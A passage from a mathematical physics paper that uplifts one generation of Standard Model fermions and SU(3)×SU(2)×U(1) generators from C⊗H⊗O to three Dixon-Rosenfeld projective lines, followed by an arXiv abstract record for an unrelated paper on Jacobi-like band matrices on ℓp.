\[\psi =\left(\mathcal{V}_{L}^{\uparrow}\epsilon_{\uparrow\uparrow}+ \mathcal{V}_{L}^{\downarrow}\epsilon_{\uparrow\downarrow}+\mathcal{E}_{L}^{ \uparrow}\epsilon_{\downarrow\uparrow}+\mathcal{E}_{L}^{\downarrow}\epsilon_{ \downarrow\downarrow}\right)l+\left(\mathcal{E}_{R}^{\downarrow*}\epsilon_{ \uparrow\uparrow}-\mathcal{E}_{R}^{\uparrow*}\epsilon_{\uparrow\downarrow}- \mathcal{V}_{R}^{\downarrow*}\epsilon_{\downarrow\uparrow}+\mathcal{V}_{R}^{ \uparrow*}\epsilon_{\downarrow\downarrow}\right)l^{*} \tag{102}\] \[\quad-I\left(\mathcal{U}_{L}^{\sigma\dagger}\epsilon_{\uparrow \uparrow}+\mathcal{U}_{L}^{a\downarrow}\epsilon_{\uparrow\downarrow}+ \mathcal{D}_{L}^{\sigma\dagger}\epsilon_{\downarrow\uparrow}+\mathcal{D}_{L}^{a \downarrow}\epsilon_{\downarrow\downarrow}\right)q_{a}+I\left(\mathcal{D}_{R}^ {a\downarrow*}\epsilon_{\uparrow\uparrow}-\mathcal{D}_{R}^{a\uparrow*} \epsilon_{\uparrow\downarrow}-\mathcal{U}_{R}^{a\downarrow*}\epsilon_{ \downarrow\uparrow}+\mathcal{U}_{R}^{a\uparrow*}\epsilon_{\downarrow\downarrow} \right)q_{a}^{*}.\] The coefficients such as \(\mathcal{V}_{L}^{\uparrow}\) are complex. In our conventions, the \(SU(3)\) Gell-Mann matrices are represented as elements of \(\mathbb{C}\otimes\overleftarrow{\mathbb{O}}\) given by \[\Lambda_{1} =-\frac{I}{2}(e_{61}-e_{25}), \Lambda_{2} =-\frac{I}{2}(e_{21}+e_{65}), \tag{103}\] \[\Lambda_{3} =-\frac{I}{2}(e_{26}-e_{15}), \Lambda_{4} =\frac{I}{2}(e_{35}-e_{17}),\] \[\Lambda_{5} =-\frac{I}{2}(e_{31}-e_{57}), \Lambda_{6} =\frac{I}{2}(e_{27}+e_{36}),\] \[\Lambda_{7} =\frac{I}{2}(e_{23}+e_{67}), \Lambda_{8} =\frac{I}{2\sqrt{3}}(e_{26}+e_{15}-e_{37}),\] where \(e_{ij}f\) stands for \(e_{i}(e_{j}f)\). For the electroweak sector with \(SU(2)\times U(1)\) symmetry, the \(SU(2)\) generators are represented in terms of imaginary quaternions and a weak isospin projector \(s=(1-Ie_{4})/2\), \[\tau_{9}=\frac{I}{2}si,\qquad\tau_{10}=\frac{I}{2}sj,\qquad\tau_{11}=\frac{I} {2}sk. \tag{104}\] The weak hypercharge is given by \[Y=-\frac{I}{2}\left(\frac{1}{3}\left(e_{15}+e_{26}+e_{37}\right)-s^{*}k\right). \tag{105}\] Note that all operators from \(SU(3)\times SU(2)\times U(1)\) are elements of \(\mathbb{C}\otimes\mathbb{H}\otimes\overleftarrow{\mathbb{O}}\) and act from the left. The electric charge operator \(Q\) is \[Q=\tau_{11}+Y=-\frac{I}{2}\left(\frac{1}{3}\left(e_{15}+e_{26}+e_{37}\right)-k \right). \tag{106}\] By separating \(\psi\) into \(\psi_{l}+\psi_{q}+\psi_{\nu}^{c}+\psi_{e}^{c}+\psi_{u}^{c}+\psi_{d}^{c}\), the following fields are found to correspond to the appropriate representations of the Standard Model, \[(\mathbf{1},\mathbf{2})_{-1/2}: \psi_{l} =\left(\mathcal{V}_{L}^{\uparrow}\epsilon_{\uparrow\uparrow}+ \mathcal{V}_{L}^{\downarrow}\epsilon_{\uparrow\downarrow}+\mathcal{E}_{L}^{ \uparrow}\epsilon_{\downarrow\uparrow}+\mathcal{E}_{L}^{\downarrow}\epsilon_{ \downarrow\downarrow}\right)l, \tag{107}\] \[(\mathbf{3},\mathbf{2})_{1/6}: \psi_{q} =-I\left(\mathcal{U}_{L}^{\sigma\dagger}\epsilon_{\uparrow \uparrow}+\mathcal{U}_{L}^{a\downarrow}\epsilon_{\uparrow\downarrow}+\mathcal{D}_{L}^ {a\uparrow}\epsilon_{\downarrow\uparrow}+\mathcal{D}_{L}^{a\downarrow}\epsilon_{ \downarrow\downarrow}\right)q_{a},\] \[(\mathbf{1},\mathbf{1})_{0}: \psi_{\nu}^{c} =\left(-\mathcal{V}_{R}^{\downarrow*}\epsilon_{\downarrow\uparrow}+ \mathcal{V}_{R}^{\uparrow*}\epsilon_{\downarrow\downarrow}\right)l^{*},\] \[(\mathbf{1},\mathbf{1})_{1}: \psi_{e}^{c} =\left(\mathcal{E}_{R}^{\downarrow*}\epsilon_{\uparrow\uparrow}- \mathcal{E}_{R}^{\uparrow*}\epsilon_{\uparrow\downarrow}\right)l^{*}\] \[(\mathbf{\overline{3}},\mathbf{1})_{-2/3}: \psi_{u}^{c} =I\left(-\mathcal{U}_{R}^{\downarrow*}\epsilon_{\downarrow\uparrow}+ \mathcal{U}_{R}^{\sigma\dagger*}\epsilon_{\downarrow\downarrow}\right)q_{a}^{*},\] \[(\mathbf{\overline{3}},\mathbf{1})_{1/3}: \psi_{d}^{c} =I\left(\mathcal{D}_{R}^{\sigma\downarrow*}\epsilon_{\uparrow\uparrow} -\mathcal{D}_{R}^{\sigma\dagger*}\epsilon_{\uparrow\downarrow}\right)q_{a}^{*},\] where we confirmed that the above states have the appropriate weak hypercharge values as well as weak isospin and electric charges. Note that complex conjugation leads to the appropriate conjugate states, which turns left(right)-chiral particles into right(left)-chiral anti-particles. Finally, the largest algebra commuting with \(\mathfrak{so}_{10}\) derived from \(\mathbb{C}\otimes\mathbb{H}\otimes\overleftrightarrow{\mathbb{O}}\) when considering action from the left and right is given by \(\mathfrak{sl}_{2,\mathbb{C}}\), which are generated by \(\{1|i,1|j,1|k,1|Ii,1|Jj,1|Ik\}\). ### Uplift to \(\mathbb{C}\otimes\mathbb{H}\otimes J_{2}(\mathbb{O})\) To uplift the physics of \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) to \(\mathbb{C}\otimes\mathbb{H}\otimes J_{2}(\mathbb{O})\), we start by considering \(f\in\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) uplifted to an off-diagonal matrix \(J_{f}^{\rm off}\in\mathbb{C}\otimes\mathbb{H}\otimes J_{2}(\mathbb{O})\). Our first goal is to understand how to implement left multiplication of \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) basis elements on \(f\) by the analogous construction in \(\mathbb{C}\otimes\mathbb{H}\otimes J_{2}(\mathbb{O})\) acting on \(J_{f}^{\rm off}\), where \[J_{f}^{\rm off}=\left(\begin{array}{cc}0&f\\ \tilde{f}&0\end{array}\right). \tag{108}\] For \(\mathbb{C}\otimes\mathbb{H}\) bases, these can be implemented by mapping the basis elements to the same elements times the identity matrix. The same cannot be done for \(\mathbb{O}\), as the elements \(e_{i}\) must map to \(J_{2}(\mathbb{O})\) via the eight off-diagonal octonionic Pauli matrices \(J_{e_{i}}\), \[J_{e_{i}}=\left(\begin{array}{cc}0&e_{i}\\ \tilde{e_{i}}&0\end{array}\right). \tag{109}\] To understand how to multiply \(f\) from the left by \(e_{i}\) generalized to \(\mathbb{C}\otimes\mathbb{H}\otimes J_{2}(\mathbb{O})\), the Fano plane is crucial. A single octonionic unit can always be implemented by multiplying by two units in four different ways. For instance, \(e_{1}=e_{1}1=e_{2}e_{3}=e_{4}e_{5}=e_{7}e_{6}\). If \(e_{1}f\) is uplifted to \(J_{e_{1}f}^{\rm off}\), by recalling the definition (90) of nested commutator of Jordan products, a generalized multiplication rule can be found to give \(J_{e_{1}f}^{\rm off}\) from \(J_{f}^{\rm off}\), \[J_{e_{1}f}^{\rm off} =m_{e_{1}}(J_{f}^{\rm off})\equiv\left\{J_{e_{1}},J_{1},J_{f}^{ \rm off}\right\}_{0}+\left\{J_{e_{3}},J_{e_{2}},J_{f}^{\rm off}\right\}_{0}+ \left\{J_{e_{5}},J_{e_{4}},J_{f}^{\rm off}\right\}_{0}+\left\{J_{e_{6}},J_{e_{ 7}},J_{f}^{\rm off}\right\}_{0}, \tag{110}\] \[J_{e_{2}f}^{\rm off} =m_{e_{2}}(J_{f}^{\rm off})\equiv\left\{J_{e_{2}},J_{1},J_{f}^{ \rm off}\right\}_{0}+\left\{J_{e_{1}},J_{e_{3}},J_{f}^{\rm off}\right\}_{0}+ \left\{J_{e_{6}},J_{e_{4}},J_{f}^{\rm off}\right\}_{0}+\left\{J_{e_{7}},J_{e_{ 5}},J_{f}^{\rm off}\right\}_{0},\] \[J_{e_{3}f}^{\rm off} =m_{e_{3}}(J_{f}^{\rm off})\equiv\left\{J_{e_{3}},J_{1},J_{f}^{ \rm off}\right\}_{0}+\left\{J_{e_{2}},J_{e_{1}},J_{f}^{\rm off}\right\}_{0}+ \left\{J_{e_{7}},J_{e_{4}},J_{f}^{\rm off}\right\}_{0}+\left\{J_{e_{5}},J_{e_{ 6}},J_{f}^{\rm off}\right\}_{0},\] \[J_{e_{4}f}^{\rm off} =m_{e_{4}}(J_{f}^{\rm off})\equiv\left\{J_{e_{4}},J_{1},J_{f}^{ \rm off}\right\}_{0}+\left\{J_{e_{1}},J_{e_{5}},J_{f}^{\rm off}\right\}_{0}+ \left\{J_{e_{2}},J_{e_{6}},J_{f}^{\rm off}\right\}_{0}+\left\{J_{e_{3}},J_{e_{ 7}},J_{f}^{\rm off}\right\}_{0},\] \[J_{e_{5}f}^{\rm off} =m_{e_{5}}(J_{f}^{\rm off})\equiv\left\{J_{e_{5}},J_{1},J_{f}^{ \rm off}\right\}_{0}+\left\{J_{e_{4}},J_{e_{1}},J_{f}^{\rm off}\right\}_{0}+ \left\{J_{e_{2}},J_{e_{7}},J_{f}^{\rm off}\right\}_{0}+\left\{J_{e_{3}},J_{e_{ 6}},J_{f}^{\rm off}\right\}_{0},\] \[J_{e_{6}f}^{\rm off} =m_{e_{6}}(J_{f}^{\rm off})\equiv\left\{J_{e_{6}},J_{1},J_{f}^{ \rm off}\right\}_{0}+\left\{J_{e_{4}},J_{e_{2}},J_{f}^{\rm off}\right\}_{0}+ \left\{J_{e_{7}},J_{e_{1}},J_{f}^{\rm off}\right\}_{0}+\left\{J_{e_{3}},J_{e_ {5}},J_{f}^{\rm off}\right\}_{0},\] \[J_{e_{7}f}^{\rm off} =m_{e_{7}}(J_{f}^{\rm off})\equiv\left\{J_{e_{7}},J_{1},J_{f}^{ \rm off}\right\}_{0}+\left\{J_{e_{4}},J_{e_{3}},J_{f}^{\rm off}\right\}_{0}+ \left\{J_{e_{1}},J_{e_{6}},J_{f}^{\rm off}\right\}_{0}+\left\{J_{e_{5}},J_{e_{ 2}},J_{f}^{\rm off}\right\}_{0}.\] Above, \(J_{1}\) represents the uplift of \(1\) to the real traceless symmetric \(2\times 2\) matrix, not an arbitrary element. Even though we are implementing octonionic multiplication, the above relations hold for \(f\in\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\). This allows for a representation of the Gell-Mann matrices in terms of elements of \(\mathbb{C}\otimes\mathbb{H}\otimes\overleftrightarrow{J_{2}(\mathbb{O})}\), \[m_{\Lambda_{1}} =-\frac{I}{2}(m_{e_{6}}m_{e_{1}}-m_{e_{2}}m_{e_{5}}), m_{\Lambda_{2}} =-\frac{I}{2}(m_{e_{2}}m_{e_{1}}+m_{e_{6}}m_{e_{5}}), \tag{111}\] \[m_{\Lambda_{3}} =-\frac{I}{2}(m_{e_{2}}m_{e_{6}}-m_{e_{1}}m_{e_{5}}), m_{\Lambda_{4}} =\frac{I}{2}(m_{e_{3}}m_{e_{5}}-m_{e_{1}}m_{e_{7}}),\] \[m_{\Lambda_{5}} =-\frac{I}{2}(m_{e_{3}}m_{e_{1}}-m_{e_{5}}m_{e_{7}}), m_{\Lambda_{6}} =\frac{I}{2}(m_{e_{2}}m_{e_{7}}+m_{e_{3}}m_{e_{6}}),\] \[m_{\Lambda_{7}} =\frac{I}{2}(m_{e_{2}}m_{e_{3}}+m_{e_{6}}m_{e_{7}}), m_{\Lambda_{8}} =\frac{I}{2\sqrt{3}}(m_{e_{2}}m_{e_{6}}+m_{e_{1}}m_{e_{5}}-2m_{e_{3}}m_{e_{7}}),\] where \(m_{\Lambda_{1}}(J_{f}^{\rm off})=-\frac{I}{2}(m_{e_{6}}(m_{e_{1}}(J_{f}^{\rm off }))-m_{e_{2}}(m_{e_{5}}(J_{f}^{\rm off})))\) more precisely. From here, particle states associated with elements of \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) can be uplifted to \(\mathbb{C}\otimes\mathbb{H}\otimes J_{2}(\mathbb{O})\). It was confirmed that the \(SU(3)\) generators above annihilate leptons and apply color rotations to the quarks in the appropriate manner. The same relations found in \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) for \(SU(2)\times U(1)\) generators are also found by the appropriate uplift to \(\mathbb{C}\otimes\mathbb{H}\otimes\overleftrightarrow{J_{2}(\mathbb{O})}\). The appropriate left action of \(g\in\mathbb{C}\otimes\mathbb{H}\) on \(f\) uplifted to \(J_{f}^{\rm off}\) can be found simply by taking \(gJ_{f}^{\rm off}\), since the diagonal elements of \(\mathbb{C}\otimes\mathbb{H}\otimes J_{2}(\mathbb{O})\) can contain \(\mathbb{C}\otimes\mathbb{H}\). Uplifting the generators of \(SU(2)\times U(1)\) therefore gives \[m_{\tau_{9}} =\frac{i}{4}\left(I+m_{e_{4}}\right),\qquad m_{\tau_{10}}=\frac{j} {4}\left(I+m_{e_{4}}\right),\qquad m_{\tau_{11}}=\frac{k}{4}\left(I+m_{e_{4}} \right), \tag{112}\] \[m_{Y} =-\frac{1}{2}\left(\frac{I}{3}\left(m_{e_{1}}m_{e_{5}}+m_{e_{2}}m _{e_{6}}+m_{e_{3}}m_{e_{7}}\right)-\frac{k}{2}\left(I-m_{e_{4}}\right)\right),\] where all multiplication is assumed to act from the left. Similarly, the electric charge operator becomes \[m_{Q}=m_{\tau_{11}}+m_{Y}=-\frac{I}{2}\left(\frac{1}{3}\left(m_{e_{1}}m_{e_{5}} +m_{e_{2}}m_{e_{6}}+m_{e_{3}}m_{e_{7}}\right)-k\right). \tag{113}\] The fermionic states in the \(\mathbb{C}\otimes\mathbb{H}\otimes J_{2}(\mathbb{O})\) are identified as \[(\mathbf{1},\mathbf{2})_{-1/2}:J_{\psi_{l}} =\left(\mathcal{V}_{L}^{\downarrow}\epsilon_{\uparrow\uparrow}+ \mathcal{V}_{L}^{\downarrow}\epsilon_{\uparrow\downarrow}+\mathcal{E}_{L}^{ \downarrow}\epsilon_{\downarrow\uparrow}+\mathcal{E}_{L}^{\downarrow}\epsilon_{ \downarrow\downarrow}\right)J_{l}, \tag{114}\] \[(\mathbf{3},\mathbf{2})_{1/6}:J_{\psi_{q}} =-I\left(\mathcal{U}_{L}^{\sigma\uparrow}\epsilon_{\uparrow \uparrow}+\mathcal{U}_{L}^{\alpha\downarrow}\epsilon_{\uparrow\downarrow}+ \mathcal{D}_{L}^{\sigma\uparrow}\epsilon_{\downarrow\uparrow}+\mathcal{D}_{L} ^{\alpha\downarrow}\epsilon_{\downarrow\downarrow}\right)J_{q_{a}},\] \[(\mathbf{1},\mathbf{1})_{0}:J_{\psi_{e}^{\prime}} =\left(-\mathcal{V}_{R}^{\downarrow*}\epsilon_{\uparrow\uparrow }+\mathcal{V}_{R}^{\uparrow*}\epsilon_{\downarrow\downarrow}\right)J_{l^{*}},\] \[(\mathbf{1},\mathbf{1})_{1}:J_{\psi_{e}^{\prime}} =\left(\mathcal{E}_{R}^{\downarrow*}\epsilon_{\uparrow\uparrow }-\mathcal{E}_{R}^{\uparrow*}\epsilon_{\uparrow\downarrow}\right)J_{l^{*}}\] \[(\mathbf{\overline{3}},\mathbf{1})_{-2/3}:J_{\psi_{q}^{\prime}} =I\left(-\mathcal{U}_{R}^{\alpha\downarrow*}\epsilon_{\downarrow \uparrow}+\mathcal{U}_{R}^{\alpha\uparrow*}\epsilon_{\downarrow\downarrow} \right)J_{q_{a}^{\prime}},\] \[(\mathbf{\overline{3}},\mathbf{1})_{1/3}:J_{\psi_{q}^{\prime}} =I\left(\mathcal{D}_{R}^{\alpha\downarrow*}\epsilon_{\uparrow \uparrow}-\mathcal{D}_{R}^{\alpha\uparrow*}\epsilon_{\uparrow\downarrow}\right)J _{q_{a}^{\prime}},\] where in our conventions, the \(\mathbb{C}\otimes\mathbb{O}\) quantities such as \(l\) and \(q_{a}\) are uplifted explicitly to give \[J_{l} =\frac{1}{2}\left(\begin{array}{cc}0&1-e_{4}I\\ 1+e_{4}I&0\end{array}\right),\qquad J_{l^{*}}=\frac{1}{2}\left(\begin{array}[] {cc}0&1+e_{4}I\\ 1-e_{4}I&0\end{array}\right), \tag{115}\] \[J_{q_{1}} =\frac{1}{2}\left(\begin{array}{cc}0&-e_{5}+e_{1}I\\ e_{5}-e_{1}I&0\end{array}\right),\qquad J_{q_{1}^{*}}=\frac{1}{2}\left(\begin{array} []{cc}0&-e_{5}-e_{1}I\\ e_{5}+e_{1}I&0\end{array}\right),\] \[J_{q_{2}} =\frac{1}{2}\left(\begin{array}{cc}0&-e_{6}+e_{2}I\\ e_{6}-e_{2}I&0\end{array}\right),\qquad J_{q_{2}^{*}}=\frac{1}{2}\left(\begin{array} []{cc}0&-e_{6}-e_{2}I\\ e_{6}+e_{2}I&0\end{array}\right),\] \[J_{q_{3}} =\frac{1}{2}\left(\begin{array}{cc}0&-e_{7}+e_{3}I\\ e_{7}-e_{3}I&0\end{array}\right),\qquad J_{q_{3}^{*}}=\frac{1}{2}\left( \begin{array}{cc}0&-e_{7}-e_{3}I\\ e_{7}+e_{3}I&0\end{array}\right).\] It was confirmed that \(m_{\tau_{11}}\), \(m_{Y}\), and \(m_{Q}\) give the appropriate eigenvalues for these states. ### Uplift to \(\mathbb{O}\otimes J_{2}(\mathbb{C}\otimes\mathbb{H})\) Next, we seek to obtain the physics of \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) by uplifting to \(\mathbb{O}\otimes J_{2}(\mathbb{C}\otimes\mathbb{H})\). The Hermitian conjugate of \(\mathbb{O}\otimes J_{2}(\mathbb{C}\otimes\mathbb{H})\) takes conjugation with respect to both \(\mathbb{C}\) and \(\mathbb{H}\). Uplifting an element \(f\in\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) to \(J_{f}^{\rm off}\in\mathbb{O}\otimes J_{2}(\mathbb{C}\otimes\mathbb{H})\) is given by \[J_{f}^{\rm off}=\left(\begin{array}{cc}0&f\\ \hat{f}^{*}&0\end{array}\right), \tag{116}\] where \(f^{*}\) is the complex conjugate and \(\hat{f}\) is the quaternionic conjugate. Finding the corresponding left action of \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) within \(\mathbb{O}\otimes J_{2}(\mathbb{C}\otimes\mathbb{H})\) is straightforward for \(\mathbb{O}\), yet requires care with \(\mathbb{C}\otimes\mathbb{H}\). Left multiplication of \(I\) on \(f\) uplifted to \(J_{1f}^{\rm off}\) must be implemented with the nested Jordan commutator product (90), \[J_{1f}^{\rm off}=m_{I}(J_{f}^{\rm off})\equiv\{J_{I},J_{1},J_{f}^{\rm off}\}_{ \circ}. \tag{117}\] This holds for arbitrary elements \(f\in\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\). The analogous relationship for imaginary quaternionic units are \[J^{\rm off}_{if}=m_{i}(J^{\rm off}_{f}) \equiv\{J_{i},J_{1},J^{\rm off}_{\mathbb{O}}\}_{\circ}+\{J_{k},J_{j},J^{\rm off}_{\mathbb{O}}\}_{\circ},\] \[J^{\rm off}_{jf}=m_{j}(J^{\rm off}_{f}) \equiv\{J_{j},J_{1},J^{\rm off}_{\mathbb{O}}\}_{\circ}+\{J_{i},J_ {k},J^{\rm off}_{\mathbb{O}}\}_{\circ}, \tag{118}\] \[J^{\rm off}_{kf}=m_{k}(J^{\rm off}_{f}) \equiv\{J_{k},J_{1},J^{\rm off}_{\mathbb{O}}\}_{\circ}+\{J_{j},J_ {i},J^{\rm off}_{f}\}_{\circ}.\] The corresponding uplift of left multiplication by imaginary octonions is given by left multiplication, such that \(J^{\rm off}_{e_{i}f}=e_{i}J^{\rm off}_{f}\). From here, the uplift of the fermionic states and the action of bosonic operators on the fermions is similar to the previous discussion on \(\mathbb{C}\otimes\mathbb{H}\otimes J_{2}(\mathbb{O})\). To highlight this uplift with more detail and for a specific example, consider \(\psi^{c}_{e}\) as a left-chiral positron and weak isospin singlet, \[\psi^{c}_{\nu}=\left(\mathcal{E}^{\downarrow*}_{R}\epsilon_{\uparrow\uparrow}- \mathcal{E}^{\uparrow*}_{R}\epsilon_{\uparrow\downarrow}\right)l^{*}=\frac{1} {4}\left(\mathcal{E}^{\downarrow*}_{R}\left(1+Ik+e_{4}I-e_{4}k\right)+ \mathcal{E}^{\uparrow*}_{R}\left(-j+Ii-e_{4}i-e_{4}Ij\right)\right). \tag{119}\] Uplifting to \(\mathbb{O}\otimes J_{2}(\mathbb{C}\otimes\mathbb{H})\) explicitly gives \[J_{\psi^{c}_{\nu}} =\left(\begin{array}{cc}0&\left(\mathcal{E}^{\downarrow*}_{R} \epsilon_{\uparrow\uparrow}-\mathcal{E}^{\uparrow*}_{R}\epsilon_{\uparrow \downarrow}\right)l^{*}\\ \left(\mathcal{E}^{\downarrow}_{R}\epsilon_{\uparrow\uparrow}-\mathcal{E}^{ \uparrow}_{R}\epsilon_{\downarrow\uparrow}\right)l&0\end{array}\right) \tag{120}\] \[=\frac{1}{4}\left(\begin{array}{cc}0&\mathcal{E}^{\downarrow*}_{ R}\left(1+Ik+e_{4}I-e_{4}k\right)+\mathcal{E}^{\uparrow*}_{R}\left(-j+Ii-e_{4}i-e_{4} Ij\right)\\ \mathcal{E}^{\downarrow}_{R}\left(1+Ik-e_{4}I+e_{4}k\right)+\mathcal{E}^{ \uparrow}_{R}\left(j+Ii+e_{4}i-e_{4}Ij\right)&0\end{array}\right).\] The action of the Gell-Mann generators uplifted to \(\mathbb{O}\otimes J_{2}(\mathbb{C}\otimes\mathbb{H})\) is \[m_{\Lambda_{1}} =-\frac{m_{I}}{2}(e_{61}-e_{25}), m_{\Lambda_{2}} =-\frac{m_{I}}{2}(e_{21}+e_{65}),\] \[m_{\Lambda_{3}} =-\frac{m_{I}}{2}(e_{26}-e_{15}), m_{\Lambda_{4}} =\frac{m_{I}}{2}(e_{35}-e_{17}), \tag{121}\] \[m_{\Lambda_{5}} =-\frac{m_{I}}{2}(e_{31}-e_{57}), m_{\Lambda_{6}} =\frac{m_{I}}{2}(e_{27}+e_{36}),\] \[m_{\Lambda_{7}} =\frac{m_{I}}{2}(e_{23}+e_{67}), m_{\Lambda_{8}} =\frac{m_{I}}{2\sqrt{3}}(e_{26}+e_{15}-e_{37}).\] The electroweak generators are given by \[m_{\tau_{9}} =\frac{m_{I}}{2}m_{s}m_{i},\qquad m_{\tau_{10}}=\frac{m_{I}}{2}m _{s}m_{j},\qquad m_{\tau_{11}}=\frac{m_{I}}{2}m_{s}m_{k},\] \[m_{Y} =-\frac{m_{I}}{2}\left(\frac{1}{3}\left(e_{15}+e_{26}+e_{37} \right)-m_{s^{*}}m_{k}\right), \tag{122}\] where \[m_{s}(J_{f})=\frac{1}{2}\left(1-e_{4}m_{I}\right)J_{f},\qquad m_{s^{*}}(J_{f}) =\frac{1}{2}\left(1+e_{4}m_{I}\right)J_{f}. \tag{123}\] The electric charge operator is given by \[m_{Q}=m_{\tau_{11}}+m_{Y}=-\frac{m_{I}}{2}\left(\frac{1}{3}\left(e_{15}+e_{26} +e_{37}\right)-m_{k}\right). \tag{124}\] The action of these generators leads to the expected results when acting on \(J_{\psi^{c}_{\nu}}\). For instance, all of the \(SU(3)\) generators vanish and \(J_{\psi^{c}_{\nu}}\) is an eigenstate of \(m_{\tau_{11}}\) and \(m_{Y}\), \[m_{\Lambda_{i}}(J_{\psi^{c}_{\nu}}) =0,\] \[m_{\tau_{11}}(J_{\psi^{c}_{\nu}}) =0,\] \[m_{Y}(J_{\psi^{c}_{\nu}}) =1J_{\psi^{c}_{\nu}}, \tag{125}\] \[m_{Q}(J_{\psi^{c}_{\nu}}) =1J_{\psi^{c}_{\nu}},\] where \(1\) is found as an eigenvalue for electric charge and weak hypercharge with the left-chiral positron. ### Uplift to \(\mathbb{C}\otimes\mathbb{O}\otimes J_{2}(\mathbb{H})\) Finally, the physics of \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) is uplifted to \(\mathbb{C}\otimes\mathbb{O}\otimes J_{2}(\mathbb{H})\). Uplifting an element \(f\in\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) to \(J_{f}^{\mathrm{eff}}\in\mathbb{C}\otimes\mathbb{O}\otimes J_{2}(\mathbb{H})\) is given by \[J_{f}^{\mathrm{eff}}=\left(\begin{array}{cc}0&f\\ \hat{f}&0\end{array}\right), \tag{126}\] where, as above, \(\hat{f}\) denotes the quaternionic conjugation of \(f\). From here, it is clear that the uplift of left multiplication by imaginary quaternionic units is identical to Eq. (118). Less care is needed with the complex numbers and octonions, as they are on the diagonals of \(\mathbb{C}\otimes\mathbb{O}\otimes J_{2}(\mathbb{H})\). The action of the Gell-Mann generators uplifted to \(\mathbb{C}\otimes\mathbb{O}\otimes J_{2}(\mathbb{H})\) is identical to Eq. (103). The electroweak generators are given by \[m_{\tau_{9}} =\frac{I}{2}\mathit{sm}_{i},\qquad m_{\tau_{10}}=\frac{I}{2} \mathit{sm}_{j},\qquad m_{\tau_{11}}=\frac{I}{2}\mathit{sm}_{k},\] \[m_{Y} =-\frac{I}{2}\left(\frac{1}{3}\left(e_{15}+e_{26}+e_{37}\right)- s^{*}m_{k}\right). \tag{127}\] The electric charge operator is given by \[m_{Q}=m_{\tau_{11}}+m_{Y}=-\frac{I}{2}\left(\frac{1}{3}\left(e_{15}+e_{26}+e_{ 37}\right)-m_{k}\right). \tag{128}\] The fermions of \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) can be uplifted to \(\mathbb{C}\otimes\mathbb{O}\otimes J_{2}(\mathbb{H})\) via Eq. (126) and the generators shown above can be found to act appropriately on the fermionic states. ## VII Conclusions In this work, we showed how to construct three homogeneous spaces that, following Rosenfeld's interpretation of the Magic Square, correspond to his "generalized" projective lines over \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\). Such spaces are obtained from three non-simple Lie algebras obtained from Tits' construction for the Freudenthal Magic Square. The quotient space of these isometry groups modded out by derivations lead to \(\mathbb{C}\otimes\mathbb{H}\otimes J_{2}\left(\mathbb{O}\right)\), \(\mathbb{O}\otimes J_{2}\left(\mathbb{C}\otimes\mathbb{H}\right)\), and \(\mathbb{C}\otimes\mathbb{O}\otimes J_{2}\left(\mathbb{H}\right)\), which contains the three newly found Dixon-Rosenfeld projective lines. The physics of \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) can be uplifted to each of these extended Jordan algebras and the generators of \(SU(3)\times SU(2)\times U(1)\) for the Standard Model can be uplifted into a (nested) chain algebra over \(\overleftarrow{\mathbb{C}\otimes\mathbb{H}\otimes J_{2}\left(\mathbb{O}\right)}\), \(\overleftarrow{\mathbb{O}\otimes J_{2}\left(\mathbb{C}\otimes\mathbb{H}\right)}\), and \(\overleftarrow{\mathbb{C}\otimes\mathbb{O}\otimes J_{2}\left(\mathbb{H}\right)}\). We provided explicit states for one generation of fermions in the standard model within these projective lines, including operators for gauge boson interactions and identification of charges. While non-simple Lie algebras were found from the Dixon-Rosenfeld projective lines and one generation of the Standard Model fermions were embedded into these projective lines, further work is needed to see if the appropriate representations of the Standard Model are contained within the corresponding isometry groups. For instance, while the bosonic interactions with fermions were demonstrated to be in the chain algebras over division algebras tensored with Jordan algebras and various \(SU(3)\times SU(2)\times U(1)\) groups can be found in the derivation groups, the representations with respect to these groups do not isolate the Standard Model fermionic representations and charges. This is similar to how \(Spin(9)\), \(SU(3)\times SU(3)\), and \(F_{4}\) are not GUT groups, but the octonions and \(F_{4}\) have been used to encode Standard Model fermions [18, 19, 17]. Additional work is needed to see if other subalgebras of these non-simple Lie algebras exist that can isolate the appropriate representation theory for the Standard Model. Otherwise, chain algebras such as \(\overleftarrow{\mathbb{A}\otimes J_{2}(\mathbb{B})}\) may lead to Clifford algebras that would be large enough to contain the Standard Model gauge group, just as \(\mathbb{C}\otimes\mathbb{H}\otimes\overleftarrow{\mathbb{O}}\) can lead to \(Cl(10)\). In future work, we seek to investigate the notion of Dixon-Rosenfeld projective planes to see if this may provide applications for three generations of the Standard Model fermions with \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\). Interactions with the Higgs boson would also be worth exploring, which has been discussed recently [17]. ## VIII Acknowledgments Thanks to Cohl Furey for countless helpful discussions related to \(\mathbb{C}\otimes\mathbb{H}\otimes\mathbb{O}\) and Mia Hughes for additional support. Thanks to Richard Clawson, Dugan Hammock, and Garrett Lisi for discussions on Clifford algebras and minimal ideals. The work of D. Corradetti is supported by a grant of the Quantum Gravity Research Institute. The work of AM is supported by a "Maria Zambrano" distinguished researcher fellowship, financed by the European Union within the NextGenerationEU program.
2301.09302
Spectral Properties of Jacobi-like Band Matrices on the Sequence Space $\ell_p$
In this paper, the spectral properties of a class of Jacobi-like operators defined over the sequence space $\ell_{p}, (1<p<\infty)$ which has a representation of an infinite band matrix where the entries of each non-zero band form a sequence with two limit points are investigated. The idea of compact perturbation is used to study the spectrum. Several spectral subdivisions are obtained. In addition, a few sufficient conditions on the absence of point spectrum over the essential spectrum are also discussed.
Arnab Patra, Jyoti Rani
2023-01-23T07:21:47Z
http://arxiv.org/abs/2301.09302v1
